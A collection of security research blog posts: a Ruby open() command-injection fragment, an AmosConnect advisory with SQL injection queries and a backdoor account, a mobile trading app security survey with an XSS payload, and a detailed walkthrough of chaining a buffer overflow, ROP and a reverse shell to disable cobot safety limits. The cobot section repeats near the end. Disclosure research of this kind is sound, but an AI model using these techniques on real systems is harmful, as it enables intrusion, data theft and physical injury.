Works as expected, right? Still, this command may be used to open a process that allows any command to be executed. If a similar Ruby script is used in a web application with weak input validation then you could just add a pipe and your favorite OS command in a remote request:
The difference between the two executions is just the pipe character at the beginning. The pipe character causes Ruby to stop using the function from open-uri, and use the native open() functionality that allows command execution[2].
Applications may be susceptible to unpredictable security issues when using certain features from programming languages. There are a number of possibilities to be abused in different implementations that could affect secure applications. There are unexpected scenarios for the interpreted programming languages parsing the code in Javascript, Perl, PHP, Python and Ruby.
Come and join me at Black Hat Europe[3] to learn more about these risky features and how to detect them. An open source extended differential fuzzing framework will be released to aid in the disclosure of these types of behaviors.
[1] Using open-uri? Check your code – you’re playing with fire! (https://sakurity.com/blog/2015/02/28/openuri.html)
AmosConnect: Maritime Communications Security Has Its Flaws
By
Mario Ballano
Satellite communications security has been a target of our research for some time: in 2014 IOActive released a document detailing many vulnerabilities in popular SATCOM systems. Since then we’ve had the opportunity to dive deeper in this area, and learned a lot more about some of the environments in which these systems are in place.
Recently, we saw that Shodan released a new tool that tracks the location of VSAT systems exposed to the Internet. These systems are typically installed in vessels to provide them with internet connectivity while at open sea.
The maritime sector makes use of some of these systems to track and monitor ships’ IT and navigation systems as well as to aid crew members in some of their daily duties, providing them with e-mail or the ability to browse the Internet. Modern vessels don’t differ that much from your typical office these days, aside from the fact that they might be floating in a remote location. Satellite connectivity is an expensive resource. In order to minimize its cost, several products exist to perform optimizations around the compression of data while in transit. One of the products that caught our eye was AmosConnect. AmosConnect 8 is a platform designed to work in a maritime environment in conjunction with satellite equipment, providing services such as:
E-mail
Instant messaging
Position reporting
Crew Internet
Automatic file transfer
Application integration
We have identified two critical vulnerabilities in this software that allow pre-authenticated attackers to fully compromise an AmosConnect server. We have reported these vulnerabilities but there is no fix for them, as Inmarsat has discontinued AmosConnect 8, announcing its end-of-life in June 2017. The original advisory is available here, and this blog post will also discuss some of the technical details.
Blind SQL Injection in Login Form A Blind SQL Injection vulnerability is present in the login form, allowing unauthenticated attackers to gain access to credentials stored in its internal database. The server stores usernames and passwords in plaintext, making this vulnerability trivial to exploit. The following POST request is sent when a user tries to log into AmosConnect
The parameter data[MailUser][emailAddress] is vulnerable to Blind SQL Injection, enabling data retrieval from the backend SQLite database using time-based attacks. Attackers that successfully exploit this vulnerability can retrieve credentials to log into the service by executing the following queries: SELECT key, value from MOBILE_PROPS WHERE key LIKE ‘USER.%.password’; SELECT key, value from MOBILE_PROPS WHERE key LIKE ‘USER.%.email_address’; The authentication method is implemented in mail_user.php:
The call to findByEmail() instantiates a COM object that is implemented in native C++ code.
The following C++ native methods are invoked upon execution of the call:
Neptune::UserManager::User::findByEmai(…)
Neptune::ConfigManager::Property::findBy( … )
Neptune::ConfigManager::Property::findAllBy( … )
The vulnerable code is implemented in Neptune::ConfigManager::Property::findAllBy() as seen below:
Strings are concatenated in an insecure manner, building a SQL query that in this case would look like:
“[…] deleted = 0 AND key like ‘USER.%.email_address’ AND upper(value) like ‘{email}'”
Privileged Backdoor Account
The AmosConnect server features a built-in backdoor account with full system privileges. Among other things, this vulnerability allows attackers to execute commands with SYSTEM privileges on the remote system by abusing AmosConnect Task Manager.
Users accessing the AmosConnect server see the following login screen:
The login website reveals the Post Office ID, this ID identifies the AmosConnect server and is tied to the software license.
The following code belongs to the authentication method implemented in mail_user.php. Note the call to authenticateBackdoorUser():
authenticateBackdoorUser() is implemented as follows:
The following code snippet shows how an attacker can obtain the SysAdmin password for a given Post Office ID:
Conclusions and thoughts
Vessel networks are typically segmented and isolated from each other, in part for security reasons. A typical vessel network configuration might feature some of the following subnets:
·Navigation systems network. Some of the most recent vessels feature “sail-by-wire” technologies; the systems in charge of providing this technology are located in this network.
·Industrial Control Systems (ICS) network. Vessels contain a lot of industrial machinery that can be remotely monitored and operated. Some vessels feature a dedicated network for these systems; in some configuration, the ICS and Navigation networks may actually be the same.
·IT systems network. Vessels typically feature a separate network to support office applications. IT servers and crew members’ work computers are connected to this network; it’s within this network that AmosConnect is typically deployed.
·Bring-Your-Own-Device networks. Vessels may feature a separate network to provide internet connectivity to guests or crew members’ personal devices.
·SATCOM. While this may change from vessel to vessel, some use a separate subnet to host satellite communications equipment.
While the vulnerabilities discussed in this blog post may only be exploited by an attacker with access to the IT systems network, it’s important to note that within certain vessel configurations some networks might not be segmented, or AmosConnect might be exposed to one or more of these networks. A typical scenario would make AmosConnect available to both the BYOD “guest” and IT networks; one can easily see how these vulnerabilities could be exploited by a local attacker to pivot from the guest network to the IT network. Also, some the vulnerabilities uncovered during our SATCOM research might enable attackers to access these systems via the satellite link.
All in all, these vulnerabilities pose a serious security risk. Attackers might be able to obtain corporate data, take over the server to mount further attacks or pivot within the vessel networks.
Applications always contain security flaws, which is why we rely on multiple layers of defense. Applications are still struggling with their defenses, even though we go through exhaustive measures of testing and defense layers. Perhaps we should rethink our approach to application defense, with the goal of introducing defensive methods that cause attackers to cease, or induce them to take incorrect actions based on false premises.
There are a variety of products that provide valuable resources when basic, off-the-shelf protection is required or the application source code is not available. However, implementations in native code provide a greater degree of defense that cannot be achieved using third-party solutions. This document aims to:
Enumerate a comprehensive list of current and new defensive techniques.
Multiple defensive techniques have been disclosed in books, papers and tools. This specification collects those techniques and presents new defensive options to fill the opportunity gap that remains open to attackers.
Enumerate methods to identify attack tools before they can access functionalities.
The tools used by attackers identify themselves in several ways. Multiple features of a request can disclose that it is not from a normal user; a tool may abuse security flaws in ways that can help to detect the type of tool an attacker is using, and developers can prepare diversions and traps in advance that the specific tool would trigger automatically.
Disclose how to detect attacker techniques within code.
Certain techniques can identify attacks within the code. Developers may know in advance that certain conditions will only be triggered by attackers, and they can also be prepared for certain unexpected scenarios.
Provide a new defensive approach.
Server-side defense is normally about blocking malicious IP addresses associated to attackers; however, an attacker’s focus can be diverted or modified. Sometimes certain functionalities may be presented to attackers only to better prosecute them if those functionalities are triggered.
Provide these protections for multiple programming languages.
This document will use pseudo code to explain functionalities that can reduce the effectiveness of attackers and expose their actions, and working proof-of-concept code will be released for four programming languages: Java, Python, .NET, and PHP.
Fernando Arnaboldi appeared at Ruxcon to present defensive techniques that can be embedded in server-side applications. The techniques described are included in a specification, along with sample implementations for multiple programming languages.
Are You Trading Securely? Insights into the (In)Security of Mobile Trading Apps
By
Alejandro Hernandez
The days of open shouting on the trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities now is easier and faster than ever; but this comes with inherent risks.
From the beginning, bad actors have also joined Wall Street’s party, developing clever models for fraudulent gains. Their efforts have included everything from fictitious brokerage firms that ended up being Ponzi schemes[1] to organized cells performing Pump-and-Dump scams.[2] (Pump: buy cheap shares and inflate the price through sketchy financials and misleading statements to the marketplace through spam, social media and other technological means; Dump: once the price is high, sell the shares and collect a profit).
When it comes to financial cybersecurity, it’s worth noting how banking systems are organized when compared to global exchange markets. In banking systems, the information is centralized into one single financial entity; there is one point of failure rather than many, which make them more vulnerable to cyberattacks.[3] In contrast, global exchange markets are distributed; records of who owns what, who sold/bought what, and to whom, are not stored in a single place, but many. Like matter and energy, stocks and other securities cannot be created from the void (e.g. a modified database record within a financial entity). Once issued, they can only be exchanged from one entity to another. That said, the valuable information as well as the attack surface and vectors in trading environments are slightly different than those in banking systems.
Picture taken from http://business.nasdaq.com/list/
Over the years I’ve used the desktop and web platforms offered by banks in my country with limited visibility of available trade instruments. Today, accessing global capital markets is as easy as opening a Facebook account through online brokerage firms. This is how I gained access to a wider financial market, including US-listed companies. Anyone can buy and sell a wide range of financial instruments on the secondary market (e.g. stocks, ETFs, etc.), derivatives market (e.g. options, binary options, contracts for difference, etc.), forex markets, or the avant-garde cryptocurrency markets.
Most banks with investment solutions and the aforementioned brokerage houses offer mobile platforms to operate in the market. These apps allow you to do things including, but not limited to:
Fund your account via bank transfers or credit card
Keep track of your available equity and buying power (cash and margin balances)
Monitor your positions (securities you own) and their performance (profit)
Monitor instruments or indexes
Give buy/sell orders
Create alerts or triggers to be executed when certain thresholds are reached
Receive real-time news or video broadcasts
Stay in touch with the trading community through social media and chats
Needless to say, whether you’re a speculator, a very active intra-day trader, or simply someone who likes to follow long-term buy-and-hold strategies, every single item on the previous list must be kept secret and only known by and shown to its owner.
Four months ago, while using my trading app, I asked myself, “with the huge amount of money transacted in the money market, how secure are these mobile apps?” So, there I was, one minute later, starting this research to expose cybersecurity and privacy weaknesses in some of these apps.
Before I pass along my results, I’d like to share the interesting and controversial moral of the story: The app developed by a brokerage firm who suffered a data breach many years ago was shown to be the most secure one.
Scope
My analysis encompassed the latest version of 21 of the most used and well-known mobile trading apps available on the Apple Store and Google Play. Testing focused only on the mobile apps; desktop and web platforms were not tested. While I discovered some security vulnerabilities in the backend servers, I did not include them in this article.
Devices:
iOS 10.3.3 (iPhone 6) [not jailbroken]
Android 7.1.1 (Emulator) [rooted]
I tested the following 14 security controls, which represent just the tip of the iceberg when compared to an exhaustive list of security checks for mobile apps. This may give you a better picture of the current state of these apps’ security. It’s worth noting that I could not test all of the controls in some of the apps either because a feature was not implemented (e.g. social chats) or it was not technically feasible (e.g. SSL pinning that wouldn’t allow data manipulation), or simply because I could not open an account.
Results
Unfortunately, the results proved to be much worse than those for personal banking appsin 2013 and 2015.[4] [5] Cybersecurity has not been on the radar of the FinTech space in charge of developing trading apps. Security researchers have disregarded these apps as well, probably because of a lack of understanding of money markets.
The issues I found in the tested controls are grouped in the following sections. Logos and technical details that mention the name of brokerage institutions were removed from the screenshots, logs, and reverse engineered code to prevent any negative impacts to their customers or reputation.
Cleartext Passwords Exposed
In four apps (19%), the user’s password was sent in cleartext either to an unencrypted XML configuration file or to the logging console. Physical access to the device is required to extract them, though.
In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-deptfh know-how (it’s relatively easily), log in through any other trading platform from the brokerage firm, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most of the apps require only the current password to link banking accounts and do not have two-factor authentication (2FA) implemented, therefore, no authorization one-time-password (OTP) is sent to the user’s phone or email.
In two apps, like the following one, in addition to logging the username and password, authentication takes place through an unencrypted HTTP channel:
In another app, the new password was exposed in the logging console when a user changes the password:
Trading and Account Information Exposed
In the trading context, operational or strategic data must not be sent unencrypted to the logging console nor any log file. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as username, password, session ID, URLs, and cryptographic tokens should not be exposed either.
62% of the apps sent sensitive data to log files, and 67% stored it unencrypted. Physical access to the device is required to extract this data.
If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.
Imagine a hypothetical scenario where a high-profile, sophisticated investor loses his phone and the trading app he has been using stores his “Potential Investments” watchlist in cleartext. If the extracted watchlist ends up in the hands of someone who wants to mimic this investor’s strategy, they could buy stocks prior to a price increase. In the worst case, imagine a “Net Worth” figure landing in the wrong hands, say kidnappers, who now know how generous ransom could be.
Balances and investment portfolio leaked in logs:
Buy and sell orders leaked in detail in the logging console:
Personal information stored in configuration files:
“Potential Investments” and “Will Buy Later” watchlists leaked in the logs console:
“Favorites” watchlists leaked in the logs too:
Quoted tickers leaked:
Symbol quoted dumped in detail in the console:
Quoted instruments saved in a local SQLite database:
Account number and balances leaked:
Insecure Communication
Two apps use unencrypted HTTP channels to transmit and receive all data, and 13 of 19 apps that use HTTPS do not check the authenticity of the remote endpoint by verifying its SSL certificate (SSL pinning); therefore, it’s feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require to trick the user into installing a malicious certificate on the mobile device.
Under certain circumstances, an attacker with access to some part of the network, such as the router in a public Wi-Fi, could see and modify information transmitted to and from the mobile app. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.
For instance, the following app uses an insecure channel for communication by default; an inexperienced user who does not know the meaning of “SSL” (Secure Socket Layer) won’t enable it on the login screen and all sensitive data will be sent and received in cleartext, without encryption:
One single app was found to send a log file with sensitive trading data to the server on a scheduled basis over an unencrypted HTTP channel.
Some apps transmit non-sensitive data (e.g. public news or live financial TV broadcastings) through insecure channels, which does not seem to represent a risk to the user.
Authentication and Session Management
Nowadays, most modern smartphones support fingerprint-reading, and most trading apps use it to authenticate their customers. Only five apps (24%) do not implement this feature.
Unfortunately, using the fingerprint database in the phone has a downside:
Moreover, after clicking the logout button, sessions were still valid on the server side in two apps. Also, another couple of apps enforced lax password policies:
Privacy Mode
One single trading app (look for “the moral of the story” earlier in this article) supports “Privacy Mode,” which protects the customers’ private information displayed on the screen in public areas where shoulder-surfing[6] attacks are feasible. The rest of the apps do not implement this useful and important feature.
However, there’s a small bug in this unique implementation: every sensitive figure is masked except in the “Positions” tab where the “Net Liquidity” column and the “Overall Totals” are fully visible:
It’s worth noting that not only balances, positions, and other sensitive values in the trading context should be masked, but also credit card information when entered to fund the account:
Client-side Data Validation
In most, but not all, of the apps that don’t check SSL certificates, it’s possible to perform MiTMattacks and inject malicious JavaScript or HTML code in the server responses. Since the Web Views in ten apps are configured to execute JavaScript code, it’s possible to trigger common Cross-site Scripting (XSS) attacks.
XSS triggered in two different apps (<script>alert(document.cookie);</script>):
Fake HTML forms injected to deceive the user and steal credentials:
Root Detection
Many Android apps do not run on rooted devices for security reasons. On a rooted phone or emulator, the user has full control of the system, thus, access to files, databases, and logs is complete. Once a user has full access to these elements, it’s easy to extract valuable information.
20 of the apps (95%) do not detect rooted environments. The single app (look for “the moral of the story” earlier in this article) that does detect it simply shows a warning message; it allows the user to keep using the platform normally:
Hardcoded Secrets in Code and App Obfuscation
Six Android app installers (.apk files) were easily reverse engineered to human-readable code. The rest had medium to high levels of obfuscation, as the one shown below. The goal of obfuscation is to conceal the applications purpose (security through obscurity) and logic in order to deter reverse engineering and to make it more difficult.
In the non-obfuscated apps, I found secrets such as cryptographic keys and third-party service partner passwords. This could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:
Interestingly, ten of the apps (47%) have traces (internal hostnames and IPs) about the internal development and testing environments where they were made or tested:
Other Weaknesses
The following trust issue grabbed my attention: a URL with my username (email) and first name passed as parameters was leaked to the logging console. This URL is opened to talk with, apparently, a chatbot inside the mobile app, but if you grab this URL and open it in a common web browser, the chatbot takes your identity from the supplied parameters and trusts you as a logged in user. From there, you can ask details about your account. As you can see, all you need to retrieve someone else’s private data is to know his/her email only and his/her name:
I haven’t had enough time to fully test this feature, but so far, I was able to extract balances and personal information.
Statistics
Since a picture is worth a thousand words, consider the following graphs:
Responsible Disclosure
One of IOActive’s missions is to act responsibly when it comes to vulnerability disclosure, thus, between September 6th and 8th, we sent a detailed report to 13 of the brokerage firms whose trading apps presented some of the higher risks vulnerabilities discussed in this article.
To the date, only two brokerage firms replied our email.
Regulators and Rating Organizations
Digging in some US regulators’ websites,[7] [8] [9] I noticed that they are already aware of the cybersecurity threats that might negatively impact financial markets and stakeholders. Most of the published content focuses on general threats that could impact end-users or institutions such as phishing, identity theft, antivirus software, social media risks, privacy, and procedures to follow in case of cybersecurity incidents, such as data breaches or disruptive attacks.
Nevertheless, I did not find any documentation related to the security risks of electronic trading nor any recommended guidance for secure software development to educate brokers and FinTech companies on how to create quality products.
Picture taken from http://www.reuters.com/article/net-us-internet-lending/for-online-lenders-wall-street-cash-brings-growth-and-risk-idUSBRE96204I20130703
In addition, there are rating organizations that score online brokers on a scale of 1 to 5 stars. I glimpsed at two recent reports [10] [11] and didn’t find anything related to security or privacy in their reviews. Nowadays, with the frequent cyberattacks in the financial industry, I think these organizations should give accolades or at least mention the security mechanisms the evaluated trading platforms implement in their reviews. Security controls should equal a competitive advantage.
Conclusions and Recommendations
There’s still a long way to go to improve the maturity level of security in mobile trading apps.
Desktop and web platforms should also be tested and improved.
Regulators should encourage brokers to implement safeguards for a better trading environment.
In addition to the generic IT best practices for secure software development, regulators should develop trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
Brokerage firms should perform regular internal audits to continuously improve the security posture of their trading platforms.
Developers should analyze their apps to determine if they suffer from the vulnerabilities I have described in this post, and if so, fix them.
Developers should design new, more secure financial software following secure coding practices.
End users should enable all of the security mechanisms their apps offer.
Side Thought
Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.
With nothing left to say, I wish you happy and secure trading!
Traditional industrial robots are boring. Typically, they are autonomous or operate with limited guidance and execute repetitive, programmed tasks in manufacturing and production settings.1They are often used to perform duties that are dangerous or unsuitable for workers; therefore, they operate in isolation from humans and other valuable machinery.
This is not the case with the latest generation collaborative robots (“cobots”) though. They function with co-workers in shared workspaces while respecting safety standards. This generation of robots works hand-in-hand with humans, assisting them, rather than just performing automated, isolated operations. Cobots can learn movements, “see” through HD cameras, or “hear” through microphones to contribute to business success.
UR5 by Universal Robots2
Baxter by Rethink Robotics3
So cobots present a much more interesting attack surface than traditional industrial robots. But are cobots only limited to industrial applications? NO, they can also be integrated into other settings!
The Moley Robotic Kitchen (2xUR10 Arms)4
DARPA’s ALIAS Robot (UR3 Arm)5
Last February, Cesar Cerrudo (@cesarcer) and I published a non-technical paper “Hacking Robots Before Skynet” previewing our research on several home, business, and industrial robots from multiple well-known vendors. We discovered nearly 50 critical security issues. Within the cobot sector, we audited leading robots, including Baxter/Sawyer from Rethink Robotics and UR by Universal Robots.
●Baxter/Sawyer: We found authentication issues, insecure transport in their protocols, default deployment problems, susceptibility to physical attacks, and the usage of ROS, a research framework known to be vulnerable to multiple issues. The major problems we reported appear to have been patched by the company in February 2017.
●UR: We found authentication issues in many of the control protocols, susceptibility to physical attacks, memory corruption vulnerabilities, and insecure communication transport. All of the issues remain unpatched in the latest version (3.4.2.65, May 2017).6
In accordance with IOActive’s responsible disclosure policy we contacted the vendors last January, so they have had ample time to address the vulnerabilities and inform their customers. Our goal is to make cobots more secure and prevent vulnerabilities from being exploited by attackers to cause serious harm to industries, employees, and their surroundings. I truly hope this blog entry moves the collaborative industry forward so we can safely enjoy this and future generations of robots.
In this post, I will discuss how an attacker can chain multiplevulnerabilities in a leading cobot (UR3, UR5, UR10 – Universal Robots) to remotely modify safety settings, violating applicable safety laws and, consequently, causing physical harm to the robot’s surroundings by moving it arbitrarily.
This attack serves as an example of how dangerous these systems can be if they are hacked. Manipulating safety limits and disabling emergency buttons could directly threaten human life. Imagine what could happen if an attack targeted an array of 64 cobots as is found in a Chinese industrial corporation.7
The final exploit abuses six vulnerabilities to change safety limits and disable safety planes and emergency buttons/sensors remotely over the network. The cobot arm swings wildly about, wreaking havoc. This video demonstrates the attack: https://www.youtube.com/watch?v=cNVZF7ZhE-8
Q: Can these robots really harm a person? A: Yes, a study8 by the Control and Robotics Laboratory at the École de technologie supérieure (ÉTS) in Montreal (Canada) clearly shows that even the smaller UR5 model is powerful enough to seriously harm a person. While running at slow speeds, their force is more than sufficient to cause a skull fracture.9Q: Wait…don’t they have safety features that prevent them from harming nearby humans? A: Yes, but they can be hacked remotely, and I will show you how in the next technical section.Q: Where are these deployed? A: All over the world, in multiple production environments every day.10Integrators Define All Safety Settings
Universal Robots is the manufacturer of UR robots. The company that installs UR robots in a specific application is the integrator. Only an integrated and installed robot is considered a complete machine.The integrators of UR robots are responsible for ensuring that any significant hazard in the entire robot system is eliminated. This includes, but is not limited to:11
Conducting a risk assessment of the entire system. In many countries this is required by law
Interfacing other machines and additional safety devices if deemed appropriate by the risk assessment
Setting up the appropriate safety settings in the Polyscope software (control panel)
Ensuring that the user will not modify any safety measures by using a “safety password.“
Validating that the entire system is designed and installed correctly
Universal Robots has recognized potentially significant hazards, which must be considered by the integrator, for example:
Penetration of skin by sharp edges and sharp points on tools or tool connectors
Penetration of skin by sharp edges and sharp points on obstacles near the robot track
Bruising due to stroke from the robot
Sprain or bone fracture due to strokes between a heavy payload and a hard surface
Mistakes due to unauthorized changes to the safety configuration parameters
Some safety-related features are purposely designed for cobot applications. These features are particularly relevant when addressing specific areas in the risk assessment conducted by the integrator, including:
Force and power limiting: Used to reduce clamping forces and pressures exerted by the robot in the direction of movement in case of collisions between the robot and operator.
Momentum limiting: Used to reduce high-transient energy and impact forces in case of collisions between robot and operator by reducing the speed of the robot.
Tool orientation limiting: Used to reduce the risk associated with specific areas and features of the tool and work-piece (e.g., to avoid sharp edges to be pointed towards the operator).
Speed limitation: Used to ensure the robot arm operates a low speed.
Safety boundaries: Used to restrict the workspace of the robot by forcing it to stay on the correct side of defined virtual planes and not pass through them.
Safety planes in action12
Safety I/O: When this input safety function is triggered (via emergency buttons, sensors, etc.), a low signal is sent to the inputs and causes the safety system to transition to “reduced” mode.
Safety scanner13
Safety settings are effective in preventing many potential incidents. But what could happen if malicious actors targeted these measures in order to threaten human life?
Statement from the UR User Guide
Changing Safety Configurations Remotely
“The safety configuration settings shall only be changed in compliance with the risk assessment conducted by the integrator.14 If any safety parameter is changed the complete robot system shall be considered new, meaning that the overall safety approval process, including risk assessment, shall be updated accordingly.”
The exploitation process to remotely change the safety configuration is as follows:
Step 1.Confirm the remote version by exploiting an authentication issue on the UR Dashboard Server. Step 2.Exploit a stack-based buffer overflow in UR Modbus TCP service, and execute commands as root. Step 3.Modify the safety.conf file. This file overrides all safety general limits, joints limits, boundaries, and safety I/O values. Step 4.Force a collision in the checksum calculation, and upload the new file. We need to fake this number since integrators are likely to write a note with the current checksum value on the hardware, as this is a common best practice. Step 5.Restart the robot so the safety configurations are updated by the new file. This should be done silently. Step 6.Move the robot in an arbitrary, dangerous manner by exploiting an authentication issue on the UR control service.
By analyzing and reverse engineering the firmware image ursys-CB3.1-3.3.4-310.img, I was able to understand the robot’s entry points and the services that allow other machines on the network to interact with the operating system. For this demo I used the URSim simulator provided by the vendor with the real core binary from the robot image. I was able to create modified versions of this binary to run partially on a standard Linux machine, even though it was clearer to use the simulator for this example exploit.
Different network services are exposed in the URControl core binary, and most of the proprietary protocols do not implement strong authentication mechanisms. For example, any user on the network can issue a command to one of these services and obtain the remote version of the running process (Step 1):
Now that I have verified the remote target is running a vulnerable image, ursys-CB3.1-3.3.4-310 (UR3, UR5 or UR10), I exploit a network service to compromise the robot (Step 2).The UR Modbus TCP service (port 502) does not provide authentication of the source of a command; therefore, an adversary could corrupt the robot in a state that negatively affects the process being controlled. An attacker with IP connectivity to the robot can issue Modbus read/write requests and partially change the state of the robot or send requests to actuators to change the state of the joints being controlled.It was not possible to change any safety settings by sending Modbus write requests; however, a stack-based buffer overflow was found in the UR Modbus TCP receiver (inside the URControl core binary).A stack buffer overflows with the recvfunction,because it uses a user-controlled buffer size to determine how many bytes from the socket will be copied there. This is a very common issue.
Before proceeding with the exploit, let’s review the exploit mitigations in place. The robot’s Linux kernel is configured to randomize (randomize_va_space=1 => ASLR) the positions of the stack, virtual dynamic shared object page, and shared memory regions. Moreover, this core binary does not allow any of its segments to be both writable and executable due to the “No eXecute” (NX) bit.
While overflowing the destination buffer, we also overflow pointers to the function’s arguments. Before the function returns, these arguments are used in other function calls, so we have to provide these calls with a valid value/structure. Otherwise, we will never reach the end of the function and be able to control the execution flow.
edx+0x2c is dereferenced and used as an argument for the call to 0x82e0c90. The problem appears afterwards when EBX (which is calculated from our previous controlled pointer on EDX) needs to also point to a structure where a file descriptor is obtained and is closed with “close” afterwards.
To choose a static address that might comply with these two requirements, I used the following static region, since all others change due to ASLR.
I wrote some scripts to find a suitable memory address and found 0x83aa1fc to be perfect since it suits both conditions:
●0x83aa1fc+0x2c points to valid memory -> 0x831c00a (“INT32”)
●0x83aa1fc+0x1014 contains 0 (nearly all this region is zeroed)
Now that I have met both conditions, execution can continue to the end of this function, and I get EIP control because the saved register on the stack was overflowed:
At this point, I control most of the registers, so I need to place my shellcode somewhere and redirect the execution flow there. For this, I used returned-oriented programming (ROP), the challenge will be to find enough gadgets to set everything I need for clean and reliable exploitation. Automatic ROP-chain tools did not work well for this binary, so I did it manually.First, I focus on my ultimate goal: to execute a reverse shell that connects to my machine. One key point when building a remote ROP-based exploit in Linux are system calls.Depending on the quality of gadgets that useint instructions I find, I will be able to use primitives such as write or dup2 to reuse the socket that was already created to return a shell or other post-exploitation strategies.In this binary, I only found one int 0x80instruction. This is used to invoke system calls in Linux on x86. Because this is a one-shot gadget, I can only perform a single system call: I will use the execve system call to execute a program. This int 0x80 instruction requires setting up a register with the system call number (EAX in this case 0xb) and then set a register (EBX) that points to a special structure.This structure contains an array of pointers, each of which points to the arguments of the command to be executed.Because of how this vulnerability is triggered, I cannot use null bytes (0x00) on the request buffer. This is a problem because we need to send commands and arguments and also create an array of pointers that end with a null byte. To overcome this, I send a placeholder, like chunks of 0xFF bytes, and later on I replace them with 0x00at runtimewith ROP.In pseudocode this call would be (calls a TCP Reverse Shell):
All the controlled data is in the stack, so first I will try to align the stack pointer (ESP) to my largest controlled section (STAGE 1). I divided the largest controlled sections into two stages, since they both can potentially contain many ROP gadgets.
As seen before, at this point I control EBX and EIP. Next, I have to align ESP to any of the controlled segments so I can start doing ROP.
The following gadget (ROP1 0x8220efa) is used to adjust ESP:
This way ESP = ESP + EBX – 1 (STAGE 1 address in the stack). This aligns ESP to my STAGE 1 section. EBX should decrease ESPby0x137 bytes, so I use the number 0xfffffec9 (4294966985) because when adding it to ESP, it wraps around to the desired value.
When the retn instruction of the gadget is executed, ROP gadgets at STAGE 1 start doing their magic.STAGE 1 of the exploit does the following:
Zero out theat the end of the arguments structure. This way the processor will know that EXECVE arguments are only those three pointers.
Save a pointer to our first command of cmd[] in our arguments structure.
Jump to STAGE 2, because I don’t have much space here.
STAGE 2 of the exploit does the following:
Zero out thexffxffxffxff at the end of each argument in cmd[].
Save a pointer to the 2nd and 3rd argument of cmd[] in on our arguments structure.
Prepare registers for EXECVE. As seen before, we needed
EBX=*args[]
EDX = 0
EAX=0xb
Call theint 0x80 gadget and execute the reverse shell.
Once the TCP reverse shell payload is executed, a connection is made back to my computer. Now I can execute commands and use sudo to execute commands as rootin the robot controller.
Safety settings are saved in the safety.conf file (Step 3). Universal Robots implemented a CRC (STM-32) algorithm to provide integrity to this file and save the calculated checksum on disk. This algorithm does not provide any real integrity to the settings, as it is possible to generate collisions or calculate new checksum values for new settings overriding special files on the filesystem. I reversed how this calculation is being made for each safety setting and created an algorithm that replicates it. On the video demo, I did not fake the new CRC value to remain the same (located on top-right of the screen), even though this is possible and easy (Step 4).
Before modifying any safety setting on the robot, I setup a process that automatically starts a new instance of the robot controller after 25 seconds with the new settings. This will give me enough time to download, modify, and upload a new safety setting file. The following command sets up a new URControl process. I used Python since it allows me to close all current file descriptors of the running process when forking. Remember that I am forking from the reverse shell object, so I need to create a new process that does not inherit any of the file descriptors so they are closed when the parent URControl process dies (in order to restart and apply new safety settings).
Now I have 25 seconds to download the current file, modify it, calculate new CRC, reupload it, and kill the running URControl process (which has an older safety settings config). I can programmatically use the kill command to target the current URControl instance (Step 5).
Finally, I send this command to the URControl service in order to load the new installation we uploaded. I also close any popup that might appear on the UI.
Finally, an attacker can simply call the movej function in the URControl service to move joints remotely, with a custom speed and acceleration (Step 6). This is shown at the end of the video.
Once again, I see novel and expensive technology which is vulnerable and exploitable. A very technical bug, like a buffer overflow in one of the protocols, exposed the integrity of the entire robot system to remote attacks. We reported the complete flow of vulnerabilities to the vendors back in January, and they have yet to be patched.
Safety I/O: When this input safety function is triggered (via emergency buttons, sensors, etc.), a low signal is sent to the inputs and causes the safety system to transition to “reduced” mode.
Safety Scanner 13
Safety settings are effective in preventing many potential incidents. But what could happen if malicious actors targeted these measures in order to threaten human life?
Statement from the UR User Guide
Changing Safety Configurations Remotely
“The safety configuration settings shall only be changed in compliance with the risk assessment conducted by the integrator.14 If any safety parameter is changed the complete robot system shall be considered new, meaning that the overall safety approval process, including risk assessment, shall be updated accordingly.”
The exploitation process to remotely change the safety configuration is as follows:
Step 1.Confirm the remote version by exploiting an authentication issue on the UR Dashboard Server. Step 2.Exploit a stack-based buffer overflow in UR Modbus TCP service, and execute commands as root. Step 3.Modify the safety.conf file. This file overrides all safety general limits, joints limits, boundaries, and safety I/O values. Step 4.Force a collision in the checksum calculation, and upload the new file. We need to fake this number since integrators are likely to write a note with the current checksum value on the hardware, as this is a common best practice. Step 5.Restart the robot so the safety configurations are updated by the new file. This should be done silently. Step 6.Move the robot in an arbitrary, dangerous manner by exploiting an authentication issue on the UR control service.
By analyzing and reverse engineering the firmware image ursys-CB3.1-3.3.4-310.img, I was able to understand the robot’s entry points and the services that allow other machines on the network to interact with the operating system. For this demo I used the URSim simulator provided by the vendor with the real core binary from the robot image. I was able to create modified versions of this binary to run partially on a standard Linux machine, even though it was clearer to use the simulator for this example exploit.
Different network services are exposed in the URControl core binary, and most of the proprietary protocols do not implement strong authentication mechanisms. For example, any user on the network can issue a command to one of these services and obtain the remote version of the running process (Step 1):
Now that I have verified the remote target is running a vulnerable image, ursys-CB3.1-3.3.4-310 (UR3, UR5 or UR10), I exploit a network service to compromise the robot (Step 2).The UR Modbus TCP service (port 502) does not provide authentication of the source of a command; therefore, an adversary could corrupt the robot in a state that negatively affects the process being controlled. An attacker with IP connectivity to the robot can issue Modbus read/write requests and partially change the state of the robot or send requests to actuators to change the state of the joints being controlled.It was not possible to change any safety settings by sending Modbus write requests; however, a stack-based buffer overflow was found in the UR Modbus TCP receiver (inside the URControl core binary).A stack buffer overflows with the recvfunction,because it uses a user-controlled buffer size to determine how many bytes from the socket will be copied there. This is a very common issue.
